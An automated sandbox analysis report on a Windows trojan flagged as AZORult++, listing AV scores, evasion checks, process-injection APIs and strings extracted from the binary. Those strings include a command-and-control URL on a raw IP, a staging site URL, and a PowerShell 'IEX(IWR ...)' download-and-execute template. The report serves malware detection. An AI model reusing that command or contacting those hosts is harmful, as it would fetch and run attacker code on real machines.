Windows Analysis Report
SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe

Overview

General Information

Sample name:	SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe
Analysis ID:	1426755
MD5:	69b4504419872fee9bc3bc996b88eb4b
SHA1:	f87cd6cc91070bb3331fe6c6e25ac84b840f0c50
SHA256:	0a06c8a177765ec2e723da7b9d406eb68c43541a6740ffa395a7297ed94e0d73
Tags:	exe
Infos:

Detection

AZORult++

Score:	88
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Detected AZORult++ Trojan

Multi AV Scanner detection for submitted file

Contain functionality to detect virtual machines

Contains functionality to compare user and computer (likely to detect sandboxes)

Contains functionality to inject code into remote processes

Found evasive API chain (may stop execution after checking locale)

Found evasive API chain (may stop execution after checking mutex)

Machine Learning detection for sample

Contains capabilities to detect virtual machines

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to dynamically determine API calls

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Detected potential crypto function

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

Program does not show much activity (idle)

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Classification

Signatures

AV Detection

Antivirus / Scanner detection for submitted sample

Source: SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe

Avira: detected

Multi AV Scanner detection for submitted file

Source: SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe	ReversingLabs: Detection: 83%
Source: SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe	Virustotal: Detection: 80%			Perma Link

Machine Learning detection for sample

Source: SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe

Joe Sandbox ML: detected

Uses Microsoft's Enhanced Cryptographic Provider

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe	Code function: 0_2_005A8306 Sleep,Sleep,Sleep,InitializeCriticalSection,GetVolumeInformationW,StringFromGUID2,wsprintfA,CreateMutexW,GetLastError,WSAStartup,CryptAcquireContextA,CryptAcquireContextA,CoInitializeEx,ExpandEnvironmentStringsW,CreateFileW,	0_2_005A8306
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe	Code function: 0_2_005A8330 InitializeCriticalSection,GetVolumeInformationW,StringFromGUID2,wsprintfA,CreateMutexW,GetLastError,WSAStartup,CryptAcquireContextA,CryptAcquireContextA,CoInitializeEx,ExpandEnvironmentStringsW,CreateFileW,ExitProcess,	0_2_005A8330
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe	Code function: 0_2_005A8F20 CryptGenRandom,HeapFree,GetProcessHeap,HeapFree,wsprintfA,GetProcessHeap,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,	0_2_005A8F20

Uses 32bit PE files

Source: SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe	Code function: 0_2_00FB8ACD FindFirstFileExW,		0_2_00FB8ACD
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe	Code function: 0_2_005A8610 EnumDisplayDevicesW,EnumDisplayDevicesW,StrStrIW,StrStrIW,StrStrIW,StrStrIW,StrStrIW,EnumDisplayDevicesW,GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,GetFileAttributesW,GetFileAttributesW,GetFileAttributesW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,PathCombineW,GetFileAttributesW,PathCombineW,GetFileAttributesW,StrStrIW,PathCombineW,PathCombineW,PathCombineW,GetFileAttributesW,GetFileAttributesW,GetFileAttributesW,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,lstrcmpA,lstrcmpA,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,PathCombineW,GetFileAttributesW,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,lstrcmpA,GetProcessHeap,HeapFree,ExpandEnvironmentStringsW,GetFileAttributesW,GetFileAttributesExW,GetComputerNameW,GetUserNameW,lstrcmpW,lstrcmpW,StrStrW,lstrcmpW,GlobalMemoryStatusEx,PathCombineW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,FindNextFileW,FindClose,StrStrIW,GetModuleFileNameW,StrStrIW,		0_2_005A8610

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe

Code function: 0_2_005A6690 HeapFree,ObtainUserAgentString,MultiByteToWideChar,MultiByteToWideChar,GetProcessHeap,HeapAlloc,MultiByteToWideChar,InternetOpenW,InternetSetOptionW,InternetConnectW,HttpOpenRequestW,InternetQueryOptionW,InternetSetOptionW,HttpSendRequestW,InternetQueryDataAvailable,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapReAlloc,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,HeapFree,GetProcessHeap,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,

0_2_005A6690

Source: SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe	String found in binary or memory: http://195.123.217.199/aahs.php
Source: SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe, 00000000.00000002.2027937445.000000000069E000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe, 00000000.00000002.2027880689.00000000005A1000.00000020.00001000.00020000.00000000.sdmp	String found in binary or memory: http://195.123.217.199/aahs.php%temp%
Source: SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe	String found in binary or memory: https://xpradiotwo.com/wp-content/uploads
Source: SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe, 00000000.00000002.2027937445.000000000069E000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe, 00000000.00000002.2027880689.00000000005A1000.00000020.00001000.00020000.00000000.sdmp	String found in binary or memory: https://xpradiotwo.com/wp-content/uploads/c

E-Banking Fraud

Detected AZORult++ Trojan

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe

Code function: 0_2_005A8DC0 EntryPoint,GetUserDefaultLangID,ExitProcess,

0_2_005A8DC0

Contains functionality to call native functions

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe	Code function: 0_2_005A5E60 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetTempPathW,wnsprintfW,wnsprintfW,PathCombineW,CreateFileW,WriteFile,WriteFile,SetEndOfFile,SetFilePointer,wnsprintfW,RtlInitUnicodeString,RtlInitUnicodeString,RtlInitUnicodeString,GetCurrentProcess,SetFilePointer,WriteFile,FlushFileBuffers,SetEndOfFile,NtQueryInformationProcess,NtClose,ReadProcessMemory,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,NtClose,NtClose,NtClose,NtClose,CloseHandle,		0_2_005A5E60
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe	Code function: 0_2_005A5AE0 GetModuleHandleW,GetProcAddress,CreateProcessW,NtQueryInformationProcess,ReadProcessMemory,GetThreadContext,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,ReadProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,CloseHandle,		0_2_005A5AE0

Detected potential crypto function

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe	Code function: 0_2_00FBE87D	0_2_00FBE87D
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe	Code function: 0_2_005A7850	0_2_005A7850
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe	Code function: 0_2_005A7430	0_2_005A7430
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe	Code function: 0_2_005A2490	0_2_005A2490
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe	Code function: 0_2_005A4250	0_2_005A4250
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe	Code function: 0_2_005A4650	0_2_005A4650

Found potential string decryption / allocating functions

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe	Code function: String function: 00FB4480 appears 33 times
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe	Code function: String function: 00FB3040 appears 46 times

Uses 32bit PE files

Source: SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: classification engine

Classification label: mal88.bank.evad.winEXE@1/0@0/0

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe

Code function: 0_2_005A6200 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,CloseHandle,AdjustTokenPrivileges,CloseHandle,

0_2_005A6200

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe

Code function: 0_2_005A6AC0 VariantInit,CoCreateInstance,SysAllocString,SysFreeString,SysFreeString,SysAllocString,SysFreeString,

0_2_005A6AC0

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe

Command line argument: jhl46745fghb

0_2_00FB2F40

Source: SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe	ReversingLabs: Detection: 83%
Source: SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe	Virustotal: Detection: 80%

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe	Section loaded: sspicli.dll	Jump to behavior

Source: SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source: SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source: SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Contains functionality to dynamically determine API calls

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe

Code function: 0_2_00FB1300 GetModuleHandleA,VirtualAlloc,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,VirtualProtect,VirtualFree,VirtualProtect,

0_2_00FB1300

Malware Analysis System Evasion

Contain functionality to detect virtual machines

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe

Code function: VMWare %systemroot%\System32\VBoxService.exe %systemroot%\System32\VBoxService.exe %systemroot%\System32\VBoxTray.exe

0_2_005A8610

Contains functionality to compare user and computer (likely to detect sandboxes)

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe

Code function: EnumDisplayDevicesW,EnumDisplayDevicesW,StrStrIW,StrStrIW,StrStrIW,StrStrIW,StrStrIW,EnumDisplayDevicesW,GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,GetFileAttributesW,GetFileAttributesW,GetFileAttributesW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,PathCombineW,GetFileAttributesW,PathCombineW,GetFileAttributesW,StrStrIW,PathCombineW,PathCombineW,PathCombineW,GetFileAttributesW,GetFileAttributesW,GetFileAttributesW,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,lstrcmpA,lstrcmpA,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,PathCombineW,GetFileAttributesW,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,lstrcmpA,GetProcessHeap,HeapFree,ExpandEnvironmentStringsW,GetFileAttributesW,GetFileAttributesExW,GetComputerNameW,GetUserNameW,lstrcmpW,lstrcmpW,StrStrW,lstrcmpW,GlobalMemoryStatusEx,PathCombineW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,FindNextFileW,FindClose,StrStrIW,GetModuleFileNameW,StrStrIW,

0_2_005A8610

Found evasive API chain (may stop execution after checking locale)

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe

Evasive API call chain: GetUserDefaultLangID, ExitProcess

Found evasive API chain (may stop execution after checking mutex)

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe

Evasive API call chain: CreateMutex,DecisionNodes,ExitProcess

Contains capabilities to detect virtual machines

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe

File opened / queried: C:\Windows\System32\VBoxService.exe

Jump to behavior

Found large amount of non-executed APIs

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe

API coverage: 9.6 %

Program does not show much activity (idle)

Source: all processes

Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe	Code function: 0_2_00FB8ACD FindFirstFileExW,		0_2_00FB8ACD
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe	Code function: 0_2_005A8610 EnumDisplayDevicesW,EnumDisplayDevicesW,StrStrIW,StrStrIW,StrStrIW,StrStrIW,StrStrIW,EnumDisplayDevicesW,GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,GetFileAttributesW,GetFileAttributesW,GetFileAttributesW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,PathCombineW,GetFileAttributesW,PathCombineW,GetFileAttributesW,StrStrIW,PathCombineW,PathCombineW,PathCombineW,GetFileAttributesW,GetFileAttributesW,GetFileAttributesW,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,lstrcmpA,lstrcmpA,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,PathCombineW,GetFileAttributesW,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,lstrcmpA,GetProcessHeap,HeapFree,ExpandEnvironmentStringsW,GetFileAttributesW,GetFileAttributesExW,GetComputerNameW,GetUserNameW,lstrcmpW,lstrcmpW,StrStrW,lstrcmpW,GlobalMemoryStatusEx,PathCombineW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,FindNextFileW,FindClose,StrStrIW,GetModuleFileNameW,StrStrIW,		0_2_005A8610

Source: SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe	Binary or memory string: Hyper-V
Source: SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe	Binary or memory string: VMWare
Source: SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe	Binary or memory string: %systemroot%\System32\VBoxService.exe
Source: SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe, 00000000.00000002.2027880689.00000000005A1000.00000020.00001000.00020000.00000000.sdmp	Binary or memory string: POST%s\|%s\|VoYGkc5RStart%d\|%sINITWindowsPowerShell\v1.0\powershell.exe -enc %S%ComSpec% /c %Skernel32Wow64DisableWow64FsRedirectionWow64RevertWow64FsRedirectionShellExecuteWshell32openReleaseSeShutdownPrivilege%Shttp://195.123.217.199/aahs.php%temp%\%paths%%SYSTEMROOT%\Microsoft.NET\Framework\v4.0.30319\csc.exe%SYSTEMROOT%\Microsoft.NET\Framework\v2.0.50727\csc.exesd2.ps1sd4.ps1https://xpradiotwo.com/wp-content/uploads/c "powershell -command IEX(IWR -UseBasicParsing '%s/%s')"Hyper-VVMWareParallels Display AdapterRed Hat QXL controller%systemroot%\System32\VBoxService.exe%systemroot%\System32\VBoxTray.exe?
Source: SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe	Binary or memory string: %systemroot%\System32\VBoxTray.exe

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe	API call chain: ExitProcess graph end node

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe

Code function: 0_2_00FB695B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_00FB695B

Contains functionality to dynamically determine API calls

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe

Code function: 0_2_00FB1300 GetModuleHandleA,VirtualAlloc,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,VirtualProtect,VirtualFree,VirtualProtect,

0_2_00FB1300

Contains functionality to read the PEB

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe	Code function: 0_2_00FB1710 mov ecx, dword ptr fs:[00000030h]	0_2_00FB1710
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe	Code function: 0_2_00FB75A2 mov eax, dword ptr fs:[00000030h]	0_2_00FB75A2
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe	Code function: 0_2_00FB9763 mov eax, dword ptr fs:[00000030h]	0_2_00FB9763
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe	Code function: 0_2_005A7640 mov eax, dword ptr fs:[00000030h]	0_2_005A7640
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe	Code function: 0_2_005A5E60 mov eax, dword ptr fs:[00000030h]	0_2_005A5E60

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe

Code function: 0_2_00FBA845 GetProcessHeap,

0_2_00FBA845

Program does not show much activity (idle)

Source: all processes

Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe	Code function: 0_2_00FB695B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00FB695B
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe	Code function: 0_2_00FB3D4E SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00FB3D4E
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe	Code function: 0_2_00FB421C IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00FB421C
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe	Code function: 0_2_00FB43AF SetUnhandledExceptionFilter,	0_2_00FB43AF

HIPS / PFW / Operating System Protection Evasion

Contains functionality to inject code into remote processes

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe

Code function: 0_2_005A5AE0 GetModuleHandleW,GetProcAddress,CreateProcessW,NtQueryInformationProcess,ReadProcessMemory,GetThreadContext,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,ReadProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,CloseHandle,

0_2_005A5AE0

Contains functionality to query CPU information (cpuid)

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe

Code function: 0_2_00FB44C5 cpuid

0_2_00FB44C5

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe

Code function: 0_2_00FB4103 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_00FB4103

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe

Code function: 0_2_005A8610 EnumDisplayDevicesW,EnumDisplayDevicesW,StrStrIW,StrStrIW,StrStrIW,StrStrIW,StrStrIW,EnumDisplayDevicesW,GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,GetFileAttributesW,GetFileAttributesW,GetFileAttributesW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,PathCombineW,GetFileAttributesW,PathCombineW,GetFileAttributesW,StrStrIW,PathCombineW,PathCombineW,PathCombineW,GetFileAttributesW,GetFileAttributesW,GetFileAttributesW,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,lstrcmpA,lstrcmpA,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,PathCombineW,GetFileAttributesW,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,lstrcmpA,GetProcessHeap,HeapFree,ExpandEnvironmentStringsW,GetFileAttributesW,GetFileAttributesExW,GetComputerNameW,GetUserNameW,lstrcmpW,lstrcmpW,StrStrW,lstrcmpW,GlobalMemoryStatusEx,PathCombineW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,FindNextFileW,FindClose,StrStrIW,GetModuleFileNameW,StrStrIW,

0_2_005A8610

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

⊘No contacted IP infos

AV Detection

Antivirus / Scanner detection for submitted sample

Source: SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe

Avira: detected

Multi AV Scanner detection for submitted file

Source: SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe	ReversingLabs: Detection: 83%
Source: SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe	Virustotal: Detection: 80%			Perma Link

Machine Learning detection for sample

Source: SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe

Joe Sandbox ML: detected

Uses Microsoft's Enhanced Cryptographic Provider

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe	Code function: 0_2_005A8306 Sleep,Sleep,Sleep,InitializeCriticalSection,GetVolumeInformationW,StringFromGUID2,wsprintfA,CreateMutexW,GetLastError,WSAStartup,CryptAcquireContextA,CryptAcquireContextA,CoInitializeEx,ExpandEnvironmentStringsW,CreateFileW,	0_2_005A8306
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe	Code function: 0_2_005A8330 InitializeCriticalSection,GetVolumeInformationW,StringFromGUID2,wsprintfA,CreateMutexW,GetLastError,WSAStartup,CryptAcquireContextA,CryptAcquireContextA,CoInitializeEx,ExpandEnvironmentStringsW,CreateFileW,ExitProcess,	0_2_005A8330
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe	Code function: 0_2_005A8F20 CryptGenRandom,HeapFree,GetProcessHeap,HeapFree,wsprintfA,GetProcessHeap,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,	0_2_005A8F20

Uses 32bit PE files

Source: SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe	Code function: 0_2_00FB8ACD FindFirstFileExW,		0_2_00FB8ACD
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe	Code function: 0_2_005A8610 EnumDisplayDevicesW,EnumDisplayDevicesW,StrStrIW,StrStrIW,StrStrIW,StrStrIW,StrStrIW,EnumDisplayDevicesW,GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,GetFileAttributesW,GetFileAttributesW,GetFileAttributesW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,PathCombineW,GetFileAttributesW,PathCombineW,GetFileAttributesW,StrStrIW,PathCombineW,PathCombineW,PathCombineW,GetFileAttributesW,GetFileAttributesW,GetFileAttributesW,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,lstrcmpA,lstrcmpA,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,PathCombineW,GetFileAttributesW,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,lstrcmpA,GetProcessHeap,HeapFree,ExpandEnvironmentStringsW,GetFileAttributesW,GetFileAttributesExW,GetComputerNameW,GetUserN